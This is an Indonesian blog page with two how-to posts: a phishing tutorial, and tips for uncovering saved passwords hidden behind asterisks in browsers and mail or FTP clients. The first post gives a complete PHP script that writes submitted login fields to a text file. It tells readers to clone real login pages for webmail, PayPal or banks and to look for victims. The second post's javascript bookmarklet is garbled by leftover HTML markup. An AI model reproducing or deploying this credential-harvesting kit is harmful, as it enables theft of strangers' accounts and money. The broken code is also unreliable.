Tampilkan postingan dengan label browser. Tampilkan semua postingan
Tampilkan postingan dengan label browser. Tampilkan semua postingan

Sabtu, 23 Oktober 2010

FAKE LOGIN HACKING

Ha..ha, saya sepertinya sudah gila menerbitkan artikel-artikel yang seharusnya tidak layak dipublikasikan. Tapi tidak mengapalah, saya hanya menyalurkan ide yang tidak bisa selamanya saya simpan dalam kepala penuh dosa ini. Ha3x... Teknik pencurian password menggunakan fake login atau lebih dikenal dengan nama phising telah saya bahas sebelumnya disini. Begitu juga dengan halaman fakelogin untuk facebook juga dapat dilihat disini. Nah bagi yang mau bereksperimen sendiri dengan berbagai halaman login palsu misalnya yahoo mail, gmail, paypal, ebay, atau bahkan account sebuah Bank? silakan dicoba disini ha3x....


Langkah pertama yang dilakukan adalah masuk ke halaman login situs yang menjadi target misalnya yahoo mail. Save Page As (default untuk firefox) atau simpan seluruh halaman secara komplit pada sebuah folder terpisah (misalkan beri nama folder mail). Kamu akan mendapatkan satu buah file html dan sebuah folder yang berisi image dan file lainya. Nah selanjutnya ganti nama file HTML menjadi index.html

Masih pada folder yang sama, buat sebuah file baru dan beri nama serial.txt. Kemudian buah sebuah file php dengan code script di bawah ini. Kemudian Simpan dengan nama login.php. Pastikan kode warna merah diganti dengan nama domain tempat penyimpanan file fake login tersebut.


Header("Location: http://nama-domain.com");
$handle = fopen("serial.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Langkah berikutnya adalah buka file index.html yang tadi menggunakan text editor. Kemudian cari code yang mengarahkan Form login biasanya diindikasikan dengan nama

Kemudian ganti action ke file login.php yang telah dibuat dan ganti method menjadi GET. Kira-kira hasilnya menjadi seperti ini:

Jika sudah, upload semua file tersebut kedalam hosting kamu sendiri dan mulailah mencari target phising sebagai korban pertama anda.. ha3x... Selamat Mencobahttp://idecapung.blogspot.com/2009/05/mencuri-password-dengan-fake-login.html

MEMBONGKAR PASSWORD ASTERIK

Asterik atau tanda ****** pada kotak password adalah teknik mengaburkan password agar tidak terlihat oleh user lain. Sebagian besar pengguna komputer awam menyimpan passwordnya dalam cache memory aplikasi. Seperti password facebook, e-mail, blog dan lain-lain dalam web browser. Kelalaian ini dapat kita manfaatkan untuk melihatnya. Berikut tip-trik melihat password yang tersembunyi di balik asterik.

1. Mengetahui password asterik di mozilla firefox
Copy paste kode di bawah ini pada address bar halaman website yang berisi username dan password yang ada asteriknya. Tekan enter maka password yang tersembunyi di belakang ****** akan terlihat dengan jelas:

CODE:
<p><p></span><code><span style="font-size: 10pt; font-family: "Courier New";">javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k<w.length;k++) x =" ((x)" g="g+1;}if" b="false;for(var" i="0;i<f.length;i++)" e="f[i].elements;for(var" j="0;j<e.length;j++)" b="true}}}return" s="'';if" type="="'password'){s="ej.value;if"></span></code></p></p>


 Cara lain untuk mengetahui password yang tersimpan dalam mozilla firefox adalah dengan klik Tools - Options - Security. Kemudian klik Saved Password, untuk melihat password yang tersimpan klik Show password.

2. Mengetahui password asterik di Internet Explorer
Download terlebih dahulu program Asterik Key disini. Setelah itu jalankan programnya. Untuk menampilkan password yang tersembunyi, klik tombol Show Internet Explorer Passwords.


3. Mengetahui password asterik di e-mail dan FTP client
Jika menemukan asterik tersimpan pada program e-mail client seperti Mozilla Thunderbird atau FTP Client seperti Filezilla. Password di belakang asterik dapat diketahui dengan sebuah program SC-PassUnleash. Download programnya disini.
 

Untuk menjalankanya, arahkan kursor dari program SC- PassUnlesh ke dalam kotak berisi asterik yang akan diketahui passwordnya.